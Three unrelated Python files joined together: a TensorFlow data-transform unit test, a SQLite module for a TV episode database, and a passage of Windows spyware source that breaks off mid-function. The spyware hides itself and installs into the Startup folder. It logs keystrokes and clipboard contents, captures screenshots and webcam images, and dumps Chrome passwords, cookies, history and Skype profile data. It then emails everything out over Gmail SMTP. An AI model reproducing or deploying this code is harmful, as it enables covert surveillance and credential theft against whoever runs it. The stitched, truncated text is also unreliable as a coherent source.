# In that case the cloud tests will fail. Disable it for now.
RUN_CLOUD_TESTS = False
class TestTransformRawData(unittest.TestCase):
    """Tests for applying a saved model"""

    @classmethod
    def setUpClass(cls):
        """Build a shared fixture: images, a CSV input file, and run analyze.py.

        Downloads the inception checkpoint over HTTP, so this needs network
        access.
        """
        # Set up dirs.
        cls.working_dir = tempfile.mkdtemp()
        cls.source_dir = os.path.join(cls.working_dir, 'source')
        cls.analysis_dir = os.path.join(cls.working_dir, 'analysis')
        cls.output_dir = os.path.join(cls.working_dir, 'output')
        file_io.create_dir(cls.source_dir)

        # Make test image files.
        img1_file = os.path.join(cls.source_dir, 'img1.jpg')
        image1 = Image.new('RGB', size=(300, 300), color=(155, 0, 0))
        image1.save(img1_file)
        img2_file = os.path.join(cls.source_dir, 'img2.jpg')
        image2 = Image.new('RGB', size=(50, 50), color=(125, 240, 0))
        image2.save(img2_file)
        img3_file = os.path.join(cls.source_dir, 'img3.jpg')
        image3 = Image.new('RGB', size=(800, 600), color=(33, 55, 77))
        image3.save(img3_file)

        # Download inception checkpoint. Note that gs url doesn't work because
        # we may not have gcloud signed in when running the test.
        url = ('https://storage.googleapis.com/cloud-ml-data/img/' +
               'flower_photos/inception_v3_2016_08_28.ckpt')
        checkpoint_path = os.path.join(cls.working_dir, "checkpoint")
        response = urlopen(url)
        with open(checkpoint_path, 'wb') as f:
            f.write(response.read())

        # Make csv input file
        cls.csv_input_filepath = os.path.join(cls.source_dir, 'input.csv')
        file_io.write_string_to_file(
            cls.csv_input_filepath,
            '1,1,Monday,23.0,%s\n' % img1_file +
            '2,0,Friday,18.0,%s\n' % img2_file +
            '3,0,Sunday,12.0,%s\n' % img3_file)

        # Call analyze.py to create analysis results.
        schema = [{'name': 'key_col', 'type': 'INTEGER'},
                  {'name': 'target_col', 'type': 'FLOAT'},
                  {'name': 'cat_col', 'type': 'STRING'},
                  {'name': 'num_col', 'type': 'FLOAT'},
                  {'name': 'img_col', 'type': 'STRING'}]
        schema_file = os.path.join(cls.source_dir, 'schema.json')
        file_io.write_string_to_file(schema_file, json.dumps(schema))
        features = {'key_col': {'transform': 'key'},
                    'target_col': {'transform': 'target'},
                    'cat_col': {'transform': 'one_hot'},
                    'num_col': {'transform': 'identity'},
                    'img_col': {'transform': 'image_to_vec', 'checkpoint': checkpoint_path}}
        features_file = os.path.join(cls.source_dir, 'features.json')
        file_io.write_string_to_file(features_file, json.dumps(features))

        cmd = ['python ' + os.path.join(CODE_PATH, 'analyze.py'),
               '--output=' + cls.analysis_dir,
               '--csv=' + cls.csv_input_filepath,
               '--schema=' + schema_file,
               '--features=' + features_file]
        subprocess.check_call(' '.join(cmd), shell=True)

    @classmethod
    def tearDownClass(cls):
        # Remove the whole temporary working tree created in setUpClass.
        shutil.rmtree(cls.working_dir)

    def test_local_csv_transform(self):
        """Test transfrom from local csv files."""
        cmd = ['python ' + os.path.join(CODE_PATH, 'transform.py'),
               '--csv=' + self.csv_input_filepath,
               '--analysis=' + self.analysis_dir,
               '--prefix=features',
               '--output=' + self.output_dir]
        print('cmd ', ' '.join(cmd))
        subprocess.check_call(' '.join(cmd), shell=True)

        # Read the tf record file. There should only be one file.
        record_filepath = os.path.join(self.output_dir,
                                       'features-00000-of-00001.tfrecord.gz')
        options = tf.python_io.TFRecordOptions(
            compression_type=tf.python_io.TFRecordCompressionType.GZIP)
        serialized_examples = list(tf.python_io.tf_record_iterator(record_filepath, options=options))
        self.assertEqual(len(serialized_examples), 3)

        # Find the example with key=1 in the file.
        first_example = None
        for ex in serialized_examples:
            example = tf.train.Example()
            example.ParseFromString(ex)
            if example.features.feature['key_col'].int64_list.value[0] == 1:
                first_example = example
        self.assertIsNotNone(first_example)

        transformed_number = first_example.features.feature['num_col'].float_list.value[0]
        self.assertAlmostEqual(transformed_number, 23.0)

        # transformed category = row number in the vocab file.
        transformed_category = first_example.features.feature['cat_col'].int64_list.value[0]
        vocab = pd.read_csv(
            os.path.join(self.analysis_dir, 'vocab_cat_col.csv'),
            header=None,
            names=['label', 'count'],
            dtype=str)
        origional_category = vocab.iloc[transformed_category]['label']
        self.assertEqual(origional_category, 'Monday')

        # Image embeddings from inception bottleneck are 2048-dim vectors.
        image_bytes = first_example.features.feature['img_col'].float_list.value
        self.assertEqual(len(image_bytes), 2048)
        self.assertTrue(any(x != 0.0 for x in image_bytes))

    @unittest.skipIf(not RUN_CLOUD_TESTS, 'GCS access missing')
    def test_local_bigquery_transform(self):
        """Test transfrom locally, but the data comes from bigquery."""
        # Make a BQ table, and insert 1 row.
        try:
            bucket_name = 'temp_pydatalab_test_%s' % uuid.uuid4().hex
            bucket_root = 'gs://%s' % bucket_name
            bucket = storage.Bucket(bucket_name)
            bucket.create()

            project_id = dl.Context.default().project_id
            dataset_name = 'test_transform_raw_data_%s' % uuid.uuid4().hex
            table_name = 'tmp_table'
            dataset = bq.Dataset((project_id, dataset_name)).create()
            table = bq.Table((project_id, dataset_name, table_name))
            table.create([{'name': 'key_col', 'type': 'INTEGER'},
                          {'name': 'target_col', 'type': 'FLOAT'},
                          {'name': 'cat_col', 'type': 'STRING'},
                          {'name': 'num_col', 'type': 'FLOAT'},
                          {'name': 'img_col', 'type': 'STRING'}])

            img1_file = os.path.join(self.source_dir, 'img1.jpg')
            dest_file = os.path.join(bucket_root, 'img1.jpg')
            file_io.copy(img1_file, dest_file)

            data = [
                {
                    'key_col': 1,
                    'target_col': 1.0,
                    'cat_col': 'Monday',
                    'num_col': 23.0,
                    'img_col': dest_file,
                },
            ]
            table.insert(data=data)

            cmd = ['python ' + os.path.join(CODE_PATH, 'transform.py'),
                   '--bigquery=%s.%s.%s' % (project_id, dataset_name, table_name),
                   '--analysis=' + self.analysis_dir,
                   '--prefix=features',
                   '--project-id=' + project_id,
                   '--output=' + self.output_dir]
            print('cmd ', ' '.join(cmd))
            subprocess.check_call(' '.join(cmd), shell=True)

            # Read the tf record file. There should only be one file.
            record_filepath = os.path.join(self.output_dir,
                                           'features-00000-of-00001.tfrecord.gz')
            options = tf.python_io.TFRecordOptions(
                compression_type=tf.python_io.TFRecordCompressionType.GZIP)
            serialized_examples = list(tf.python_io.tf_record_iterator(record_filepath, options=options))
            self.assertEqual(len(serialized_examples), 1)

            example = tf.train.Example()
            example.ParseFromString(serialized_examples[0])

            transformed_number = example.features.feature['num_col'].float_list.value[0]
            self.assertAlmostEqual(transformed_number, 23.0)
            transformed_category = example.features.feature['cat_col'].int64_list.value[0]
            self.assertEqual(transformed_category, 2)
            image_bytes = example.features.feature['img_col'].float_list.value
            self.assertEqual(len(image_bytes), 2048)
            self.assertTrue(any(x != 0.0 for x in image_bytes))
        finally:
            # Best-effort cleanup of every cloud resource created above.
            dataset.delete(delete_contents=True)
            for obj in bucket.objects():
                obj.delete()
            bucket.delete()
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A portal to the tv database.
"""
import sqlite3, logging, os
from datetime import date
import re
from collections import OrderedDict
from . import tvregexes, util
from .util import normpath, split_root_dir, ensure_utf8, ancestry, posixpath
from . import appconfig as cfg
from .texceptions import InitExistingDatabaseError, IncompleteEpisodeError, InvalidArgumentError
from . import __pkgname__
log = logging.getLogger(__pkgname__)
class Episode(OrderedDict):
    """
    One TV episode, stored as an ordered mapping over a fixed key set.

    Keys mapping to database fields:
    --------------------------
    'id' : the episode's id (from thetvdb) (int)
    'created_at' : the time which episode is added to database (datetime)
    'modified_at' : last modified time of episode in database (datetime)
    'title' : title of episode (str)
    'ep_number' : number of episode in season (int)
    'extra_ep_number' : number of extra episode in file (if any) (int)
    'ep_summary' : plot summary of episode (str)
    'air_date' : date when episode first aired (date)
    'file_path' : path to media file containing episode (relative to source dir) (str)
    'season_id' : id of episode's season (from thetvdb) (int)
    'season_number' : number of season (int)
    'series_id' : id of episode's series (from thetvdb) (int)
    'series_title' : title of series (str)
    'series_summary' : plot summary of series (str)
    'series_start_date' : when series first aired (date)
    'run_time_minutes' : (int)
    'network' : (str)

    Keys extracted by the filename parser (not in database):
    ---------------------------
    'release_group' : scene release group
    'which_regex' : which regex matched the episode
    'extra_info' : any seemingly irrelevant text from filename

    This is a dict-derived type which does not allow creation of new keys
    except those listed; __setitem__ converts given values to their
    correct types when possible.

    Attributes
    -----------------
    dvdrip : bool - suggests using DVD episode ordering when looking up
        info from tvdb.
    root_dir : the source directory that relative paths resolve against.
    """
    # The complete, closed set of keys an Episode may hold;
    # __setitem__ raises KeyError for anything else.
    preset_keys = (
        'id',
        'created_at',
        'modified_at',
        'title',
        'ep_number',
        'extra_ep_number',
        'ep_summary',
        'air_date',
        'file_path',
        'season_id',
        'season_number',
        'series_id',
        'series_title',
        'series_summary',
        'series_start_date',
        'run_time_minutes',
        'network',
        #parser keys
        'release_group',
        'which_regex',
        'extra_info',
        )
    # Values stored under these keys are coerced to int by __setitem__.
    numeric_keys = (
        'id',
        'ep_number',
        'extra_ep_number',
        'season_id',
        'season_number',
        'series_id',
        'run_time_minutes'
        )
    #keys which matter only in local context
    local_keys = (
        'file_path',
        'release_group',
        'extra_ep_number',
        'which_regex',
        'extra_info'
        )
    # Subset of keys that are persisted to / loaded from the episode table.
    db_keys = (
        'id',
        'title',
        'ep_number',
        'extra_ep_number',
        'ep_summary',
        'air_date',
        'file_path',
        'season_id',
        'season_number',
        'series_id',
        'series_title',
        'series_summary',
        'series_start_date',
        'run_time_minutes',
        'network'
        )

    def __init__(self, path, root_dir):
        """
        Create an Episode for the media file at `path` with every preset
        key initialized to None.  `root_dir` is normalized and kept for
        later relative/absolute path resolution in path().
        """
        #path = util.ensure_utf8(path)
        super(Episode, self).__init__()
        # Seed every key straight through OrderedDict.__setitem__ so the
        # coercion logic in our own __setitem__ is bypassed for the
        # initial None values.
        for key in self.preset_keys:
            super(Episode, self).__setitem__(
                key, None
                )
        # This assignment goes through our __setitem__ (utf-8 coercion).
        self['file_path'] = path
        self.root_dir = normpath(root_dir)
        self.dvdrip = False

    def safe_update(self, otherep):
        """
        safe_update(dict) -> None\n
        otherep can be an Episode object or any dict like
        object with the same keys.\n
        Unlike dict.update(), this will only update
        'None' values in the destination dict.
        """
        for key in otherep.keys():
            # Never clobber a value that is already known.
            if self[key] is not None: continue
            self[key] = otherep[key]

    def is_fully_parsed(self):
        """
        Ep is fully parsed, true or false.\n
        Will throw key exceptions if self is not a good ep dict.
        """
        # season/episode numbers may legitimately be 0, so compare
        # against None explicitly rather than relying on truthiness.
        return self['series_title'] and self['season_number'] is not None and self['ep_number'] is not None

    def clean_name(self, name):
        #TODO: find junk
        """
        Strips all kinds of junk from a name.

        Collapses junk matches (per tvregexes.junk) to spaces, trims,
        and title-cases the result.  Returns None for a None input.
        """
        junk = tvregexes.junk
        if name is None: return None
        name = re.sub(junk, ' ', name)
        name = name.strip()
        name = name.title()
        return name

    def path(self, form='abs'):
        """
        Return this episode's file path.
        `form` may be 'abs' or 'rel' (absolute or relative)
        Can also be 'db' which is same as 'rel' but backslashes
        are always replaced by forward slashes.
        path will be returned in respective form.
        Relative means relative to `root_dir`.

        Raises InvalidArgumentError for any other `form` value.
        """
        if form == 'abs':
            root, path = split_root_dir(self['file_path'], self.root_dir)
            return normpath(os.path.join(root, path))
        elif form == 'rel':
            return split_root_dir(self['file_path'], self.root_dir)[1]
        elif form == 'db':
            # Same as 'rel' but normalized to forward slashes for
            # platform-independent storage in the database.
            p = split_root_dir(self['file_path'], self.root_dir)[1]
            return posixpath(p)
        else:
            raise InvalidArgumentError(
                'arg `form` must be "abs" or "rel", you gave %s' % form
                )

    def pretty(self):
        """
        Get pretty print output of this episode ('key : value' lines).
        """
        # NOTE(review): iteritems() is Python-2 only.
        return '\n'.join(['%s : %s' % (k, v) for k, v in self.iteritems()])

    def __setitem__(self, key, value):
        """
        Type-checked item assignment.

        Rejects keys outside preset_keys with KeyError.  Values for
        numeric_keys are coerced with int() (raising on non-numeric
        input); non-empty strings are utf-8 normalized and empty strings
        become None.  Everything else is stored as-is.
        """
        if key not in self.preset_keys:
            raise KeyError(
                '''\'%s\' is not a valid key for a Episode.
                \nValid keys are: %s''' % (key, self.preset_keys))
        def set_val(val):
            #really set the value to key
            super(Episode, self).__setitem__(key, val)
        # Numeric coercion happens before the string branch, so an empty
        # string under a numeric key raises ValueError instead of being
        # normalized to None.
        if key in self.numeric_keys and value is not None:
            #will raise an error if value is not a valid number
            return set_val(int(value))
        #strings
        # NOTE(review): `basestring` makes this module Python-2 only.
        if isinstance(value, basestring):
            # The `value is None` test here is redundant (None is never
            # a basestring) but harmless.
            if value == '' or value is None:
                return set_val(None)
            return set_val(util.ensure_utf8(value))
        return set_val(value)
class Database(object):
    """
    Thin wrapper around a single sqlite3 database file.

    A fresh connection is opened (and closed) for every query, and all
    access funnels through one generic entry point, execute_query().
    """

    def __init__(self, dbfile):
        self.dbfile = dbfile

    def db_file_exists(self):
        """Return True when the backing database file exists on disk."""
        return os.path.exists(self.dbfile)

    def _get_connection(self):
        # One connection per call; rows come back as sqlite3.Row so
        # callers can address columns by name as well as by index.
        connection = sqlite3.connect(self.dbfile, detect_types=True)
        connection.row_factory = sqlite3.Row
        return connection

    def execute_query(self, query, params=(), fetch=-1, isscript=False):
        """
        Execute `query` with `params` and return rows per `fetch`:

            fetch == 0  -> None
            fetch == 1  -> a single row (cursor.fetchone)
            fetch  > 1  -> at most `fetch` rows (cursor.fetchmany)
            fetch  < 0  -> every row (cursor.fetchall); the default

        Rows are sqlite3.Row objects.  With isscript=True the query is
        run through cursor.executescript (params are ignored by sqlite
        in that mode).  The connection is committed on success and
        always closed; database errors propagate to the caller.
        """
        #TODO: wrap errors into some friendly packages.
        connection = self._get_connection()
        cursor = connection.cursor()
        try:
            if isscript:
                cursor.executescript(query)
            else:
                cursor.execute(query, params)
            if fetch == 0:
                result = None
            elif fetch == 1:
                result = cursor.fetchone()
            elif fetch > 1:
                result = cursor.fetchmany(fetch)
            else:
                result = cursor.fetchall()
            connection.commit()
        finally:
            connection.close()
        return result
class TVDatabase(Database):
    """
    Episode persistence on top of Database, rooted at a source
    directory.  Episode file paths are stored relative to that
    directory, in posix (forward-slash) form.
    """

    def __init__(self, directory):
        """Open (or point at) the database file inside `directory`."""
        self.directory = normpath(util.ensure_utf8(directory))
        dbfile = os.path.join(
            directory,
            cfg.get('database', 'local-database-filename')
            )
        super(TVDatabase, self).__init__(dbfile)

    def create_database(self, force=False, soft=False):
        """
        Import the database schema to a new database.
        This will raise a InitExistingDatabaseError if db already exists.
        If force==True: delete existing dbfile before creating.
        If soft==True: silently do nothing when the db already exists.
        """
        if self.db_file_exists():
            if force:
                os.unlink(self.dbfile)
            elif soft:
                return
            else:
                raise InitExistingDatabaseError(self.dbfile)
        # schema.sql ships alongside this module.
        schema = open(
            os.path.join(
                os.path.dirname(__file__), 'schema.sql')).read()
        self.execute_query(schema, isscript=True)

    def _exists(self, id_):
        """
        _exists(id_) -> True or False
        Check if row with given id_ exists in episode table.
        """
        log.debug(
            'Will check if id:%s (type:%s) exists in db',
            id_, type(id_)
            )
        q = 'SELECT * FROM episode WHERE id = ?;'
        res = self.execute_query(q, (id_,), fetch=1)
        if res: return True
        else: return False

    def episode_exists(self, ep):
        """
        episode_exists(Episode) -> bool
        Check if an episode with same id as given already
        exists in database.
        """
        if not ep['id']:
            #TODO: HACK
            # An id-less episode can't match anything by id.
            return False
        return self._exists(ep['id'])

    def path_exists(self, path):
        """
        path_exists(path) -> bool
        Check whether an episode with given path exists in db.
        Returns True or False respectively.
        """
        # NOTE(review): the string literal below is commented-out code
        # left behind as a bare expression statement; it has no effect
        # at runtime.
        """
        path = os.path.relpath(
            os.path.abspath(path),
            self.directory
            )
        """
        q = 'SELECT id FROM episode WHERE file_path = ?;'
        log.debug(path)
        # Paths are stored posix-style, so normalize before comparing.
        params = (posixpath(ensure_utf8(path)),)
        res = self.execute_query(q, params, fetch=1)
        if res: return True
        else: return False

    def get_episodes(self, where_statement='', params=()):
        """
        get_episode(where_statement='', params=()) -> yield Episode
        yield all episodes matching given where_statement.
        where_statement should be a valid sqlite3 in form 'WHERE [expression]'
        parametarized queries are preferred for safety, but not enforced here.
        If no where_statement is given, all episodes are selected.
        """
        q = 'SELECT * FROM episode ' + where_statement
        for row in self.execute_query(q, params):
            e = Episode('', self.directory)
            # update() routes through Episode.__setitem__, so column
            # values get the usual type coercion.
            e.update(row)
            yield e

    def delete_episode(self, epid):
        """
        Delete episode with given `epid` from database.
        """
        q = 'DELETE FROM episode WHERE id = ?;'
        p = (epid,)
        self.execute_query(q, p, fetch=0)

    def _insert_episode(self, epobj):
        """INSERT `epobj`'s db_keys into the episode table; return its id."""
        q = 'INSERT INTO episode (%s) VALUES (%s);'
        insfields = ','.join(epobj.db_keys)
        insvals = ','.join('?' for x in epobj.db_keys)
        q = q % (insfields, insvals)
        params = [epobj[k] for k in epobj.db_keys]
        self.execute_query(q, params, fetch=0)
        return epobj['id']

    def _update_episode(self, epobj):
        """UPDATE the row matching `epobj['id']`; return that id."""
        q = 'UPDATE episode SET %s WHERE id = ?;'
        updfields = ','.join(['%s=?' % (key) for key in epobj.db_keys])
        q = q % updfields
        params = [epobj[k] for k in epobj.db_keys]+[epobj['id']] #add 'id' for the where stmnt
        log.debug('%s\n%s', q, params)
        self.execute_query(q, params, fetch=0)
        return epobj['id']

    def upsert_episode(self, epobj):
        """
        upsert_episode(LocalEpisode) -> int episode id
        database upsert function.
        Implicitly converts episode's file_path
        to its relative path from self.directory

        Raises IncompleteEpisodeError when the episode has no id.
        """
        if not epobj['id']:
            raise IncompleteEpisodeError(
                'Unable to add id-less episode to the database: %s' % epobj
                )
        epobj['file_path'] = ensure_utf8(epobj.path('db'))
        if self._exists(epobj['id']):
            return self._update_episode(epobj)
        else:
            return self._insert_episode(epobj)

    def add_unparsed_child(self, child_path):
        """
        Record `child_path` (and each of its ancestors) in the
        unparsed_episode table, automatically deriving each entry's
        parent path.  Duplicate inserts are ignored.
        """
        log.debug('adding unparsed child: %s', child_path)
        root, path = split_root_dir(child_path, self.directory)
        q = '''
        INSERT INTO unparsed_episode(
        child_path, parent_path) VALUES (?, ?);
        '''
        def do_query(ps):
            # Best-effort insert; a unique-constraint violation just
            # means the path is already recorded.
            try:
                self.execute_query(
                    q,
                    (ensure_utf8(ps[0]), ensure_utf8(ps[1])),
                    fetch=0
                    )
            except sqlite3.IntegrityError as e:
                #probable means child_path is not unique
                # NOTE(review): e.message is Python-2 only.
                log.debug(
                    'Error while adding unparsed child '\
                    +'(usually nothing to worry about): %s\nmessage: %s',
                    ps, e.message
                    )
                pass
        ancest = ancestry(path)
        if not ancest: #no parents
            params = (path, None)
            do_query(params)
        elif len(ancest) == 1: #only parent, no gramps
            params = (path, ancest[0])
            do_query(params)
        else: #grandparents and shit
            do_query((path, ancest[-1])) #put filename itself
            # Walk the ancestor chain top-down, linking each directory
            # to the one above it.
            for index, p in enumerate(ancest):
                if index == 0:
                    params = (p, None)
                else:
                    params = (p, ancest[index-1]) #parent is p from before
                do_query(params)
def make_where_statement(dicta=None, operator='=', separator='AND', **kwargs):
    """
    make_where_statement(dicta=None, operator='=', separator='AND', **kwargs)
        -> (where_string, params_tuple)

    Build a simple parameterized WHERE clause compatible with
    execute_query.

    `operator` sits between each column and its placeholder ('=', '>',
    '<', '!=', 'LIKE', ...); `separator` joins the individual
    conditions ('AND', 'OR', ...).  Column/value pairs may be supplied
    either as a dict in `dicta` or as keyword arguments (a non-empty
    `dicta` takes precedence over kwargs).

    Returns ('', ()) when no pairs are given, otherwise a string of the
    form 'WHERE col OP ? [SEP col OP ? ...] ' together with the
    matching parameter tuple.
    """
    pairs = dicta if dicta else kwargs
    if not pairs:
        return ('', ())
    clause = ''
    params = []
    # .items() instead of the Python-2-only .iteritems(): identical
    # iteration semantics, but also works on Python 3.
    for column, value in pairs.items():
        prefix = 'WHERE' if not clause else separator
        clause += '%s %s %s ? ' % (prefix, column, operator)
        params.append(value)
    # Return a tuple so both branches (and the docstring's contract)
    # agree on the params type; previously the non-empty branch
    # returned a list while the empty branch returned ().
    return (clause, tuple(params))
|
|
import os
import time
import psutil
import shutil
import pyHook
import smtplib
import sqlite3
import win32con
import win32api
import win32gui
import mimetypes
import pythoncom
import win32crypt
import win32console
from ctypes import *
import win32clipboard
from os import getenv
from Queue import Queue
from PIL import ImageGrab
from threading import Thread
from SimpleCV import Camera
from email.utils import formatdate
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from datetime import datetime, timedelta
from email.mime.multipart import MIMEMultipart
NUMBER_OF_THREADS = 7
JOB_NUMBER = [1, 2, 3, 4, 5, 6, 7]
queue = Queue()
PROCNAME = "chrome.exe"
# KEYLOGGER CONFIG
# Output Config
path_to_files = "C:/Users/" + win32api.GetUserName() + "/Documents/Windows Defender/"
file_name = path_to_files + "log.txt"
path_to_images = path_to_files + "IMAGES/"
# CAMERA CONFIG
# Screenshot
# interval in sec
interval_screenshot = 120
# WebCam
# interval in sec
interval_webcam = 120
# MAIL CONFIG
files = [path_to_files + "log.txt", ]
FromConf = 'username@gmail.com'
ToConf = 'username@gmail.com'
passwordConf = 'password'
intervalMail = 600
# Window Config
curr_window = None
class Startup:
def hide(self):
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
def add_to_startup(self):
path = "C:\\Users\\" + win32api.GetUserName() + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
if os.path.isfile(path + __file__) == True:
pass
else:
shutil.copy(os.getcwd() + __file__, path)
def create_hidden_folder(self):
if os.path.exists(path_to_files):
pass
else:
os.makedirs(path_to_files)
win32api.SetFileAttributes(path_to_files, win32con.FILE_ATTRIBUTE_HIDDEN)
def kill_chrome(self):
for proc in psutil.process_iter():
try:
if proc.name() == PROCNAME:
proc.kill()
except:
pass
def make_dirs(self):
if not os.path.exists(path_to_files + "SKYPE"):
os.mkdir(path_to_files + "SKYPE")
if not os.path.exists(path_to_files + "IMAGES"):
os.mkdir(path_to_files + "IMAGES")
if not os.path.exists(path_to_files + "CHROME"):
os.mkdir(path_to_files + "CHROME")
if not os.path.exists(path_to_files + "FIREFOX"):
os.mkdir(path_to_files + "FIREFOX")
def run(self):
self.hide()
self.add_to_startup()
self.create_hidden_folder()
self.make_dirs()
self.kill_chrome()
class Keylogger:
def get_curr_window(self):
user32 = windll.user32
kernel32 = windll.kernel32
hwnd = user32.GetForegroundWindow()
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
process_id = "%d" % pid.value
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
windll.psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
pid_info = "\n[ PID %s - %s - %s ]" % (process_id, executable.value, window_title.value)
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
return pid_info
def keydown(self, event):
global data
global curr_window
if event.WindowName != curr_window:
curr_window = event.WindowName
fp = open(file_name, 'a')
data = self.get_curr_window()
fp.write(data + "\n")
fp.close()
if event.Ascii > 32 and event.Ascii < 127:
fp = open(file_name, 'a')
data = chr(event.Ascii)
fp.write(data)
fp.close()
else:
while event.Key == "Lcontrol" or "Rcontrol" and event.Key == "A":
fp = open(file_name, 'a')
fp.write("[SELECT-ALL]")
fp.close()
break
while event.Key == "Lcontrol" or "Rcontrol" and event.Key == "C":
fp = open(file_name, 'a')
fp.write("[COPY]")
fp.close()
break
while event.Key == "Lcontrol" or "Rcontrol" and event.Key == "V":
win32clipboard.OpenClipboard()
try:
data = "\n[PASTE] - %s\n" % win32clipboard.GetClipboardData()
except TypeError:
pass
win32clipboard.CloseClipboard()
fp = open(file_name, 'a')
fp.write(data)
fp.close()
break
if event.Key == "Lshift" or "Rshift" or "Return" or "Back":
fp = open(file_name, 'a')
data = "[%s]" % event.Key
fp.write(data)
fp.close()
else:
fp = open(file_name, 'a')
data = "\n[%s]\n" % event.Key
fp.write(data)
fp.close()
def keylogger(self):
obj = pyHook.HookManager()
obj.KeyDown = self.keydown
obj.HookKeyboard()
obj.HookMouse()
pythoncom.PumpMessages()
def webcam_pic(self, interval_w):
try:
cam = Camera()
while True:
time.sleep(interval_w)
cur_time = str(str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min) + "_" + str(time.localtime().tm_sec))
scr = path_to_images + "webcam_" + cur_time + ".jpg"
files.append(str(scr))
img = cam.getImage()
img.save(scr)
except Exception as e:
print e
def screenshot(self, interval_scr):
while True:
try:
time.sleep(interval_scr)
cur_time = str(str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min) + "_" + str(time.localtime().tm_sec))
scr = path_to_images + "screenshot_" + cur_time + ".png"
files.append(str(scr))
ImageGrab.grab().save(scr, "PNG")
except Exception as e:
print e
def run(self):
self.keylogger()
class Chrome:
"""
Dump All Chrome Passwords
Output:
Website: some-website.com
Username: some username for this website
Password: password for this Username
"""
def dump_passwords(self):
con = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cur = con.cursor()
cur.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cur.fetchall():
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
site = 'Site: %s\n' % result[0]
username = 'Username: %s\n' % result[1]
password = 'Password: %s\n\n' % password
with open(r'' + str(path_to_files) + 'CHROME/chrome_passwords.txt', 'a') as outputfile:
outputfile.write(site + username + password)
outputfile.close()
files.append(path_to_files + 'CHROME/chrome_passwords.txt')
def dump_history(self):
con = sqlite3.connect(os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\history")
cur = con.cursor()
output_file = open(r'' + str(path_to_files) + 'CHROME/chrome_history.txt', 'a')
cur.execute('SELECT url, title, last_visit_time FROM urls')
for row in cur.fetchall():
output_file.write("Website: %s \n\t Title: %s \n\t Last Visited: %s \n\n" % (
u''.join(row[0]).encode('utf-8').strip(), u''.join(row[1]).encode('utf-8').strip(),
u''.join(str(row[2])).encode('utf-8').strip()))
output_file.close()
files.append(path_to_files + 'CHROME/chrome_history.txt')
def dump_cookies(self):
con = sqlite3.connect(os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Cookies")
cur = con.cursor()
output_file = open(r''+ str(path_to_files) + 'CHROME/chrome_cookies.txt', 'a')
cur.execute('SELECT host_key, name, value FROM Cookies')
for row in cur.fetchall():
output_file.write("Hostname: %s \n\t Name: %s \n\t Value: %s \n\n" % (u''.join(row[0]).encode('utf-8').strip(), u''.join(row[1]).encode('utf-8').strip(),u''.join(row[2]).strip()))
output_file.close()
files.append(path_to_files + 'CHROME/chrome_cookies.txt')
class InternetExplorer:
def dump_cookies(self):
pass
def dump_history(self):
pass
class Firefox:
db_files = ['', '', '']
def dump_cookies(self):
pass
def dump_history(self):
pass
def dump_downloads(self):
pass
class BrowserHandler:
def chrome(self):
Chrome().dump_cookies()
Chrome().dump_history()
Chrome().dump_passwords()
def internet_explorer(self):
pass
def firefox(self):
Firefox().dump_history()
Firefox().dump_cookies()
Firefox().dump_downloads()
def run(self):
if os.path.isdir(os.getenv("APPDATA") + "\..\Local\Google\Chrome"):
self.chrome()
if os.path.isdir(os.getenv("APPDATA") + "\..\Roaming\Mozilla\Firefox"):
self.firefox()
else:
pass
class Skype:
def get_skype_dir(self):
base_dir = os.getenv("APPDATA") + "\..\Roaming\Skype"
subdirectories = os.listdir(base_dir)
for dir in subdirectories:
if not (dir == 'Content' or dir == 'DataRv' or dir == 'My Skype Received Files' or dir == 'RootTools' or dir == 'shared.lck' or dir == 'shared.xml' or dir == 'shared_dynco' or dir == 'shared_httpfe'):
return dir
def dump_skype_info(self, uname):
con = sqlite3.connect(os.getenv("APPDATA") + "\..\Roaming\Skype\%s\main.db" % uname)
cur = con.cursor()
output_file = open(r''+ str(path_to_files) + 'SKYPE/skype_data.txt', 'a')
cur.execute('SELECT signin_name, skypename, fullname, birthday, gender, languages, country, province, phone_home, phone_office, phone_mobile, emails, homepage FROM Accounts')
for result in cur.fetchall():
birthday = datetime.fromtimestamp(result[3]).strftime('%Y-%m-%d')
if result[4] == 1:
gender = "Male"
else:
gender = "Female"
general_info = "General Information:\n\tFull Name: %s\n\tBirthday: %s\n\tGender: %s\n\tLanguage: %s\n\tCountry: %s\n\tProvince: %s\n\n" % (result[2], birthday, gender, result[5], result[6], result[7])
contact_info = "Contact Information:\n\tPhone Home: %s\n\tPhone Office: %s\n\tPhone Mobile: %s\n\tE-Mail: %s\n" % (result[8], result[9], result[10], result[11])
output_file.write(general_info + contact_info)
output_file.close()
files.append(path_to_files + "SKYPE/skype_data.txt")
con.close()
def get_skype_info(self):
if os.path.isdir(os.getenv("APPDATA") + "\..\Roaming\Skype"):
skype_uname = self.get_skype_dir()
self.dump_skype_info(skype_uname)
else:
pass
def run(self):
self.get_skype_info()
class MailHandler:
def send_mail(self, From, to, password, interval_mail):
while True:
time.sleep(interval_mail)
msg = MIMEMultipart()
msg['From'] = From
msg['To'] = to
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = 'Lo0sR-Keylogger'
msg.attach(MIMEText('Output'))
try:
smtp = smtplib.SMTP('smtp.gmail.com:587')
smtp.starttls()
smtp.login(From, password)
except:
login = 'failed'
else:
login = 'success'
if login == 'success':
for f in files:
f = f
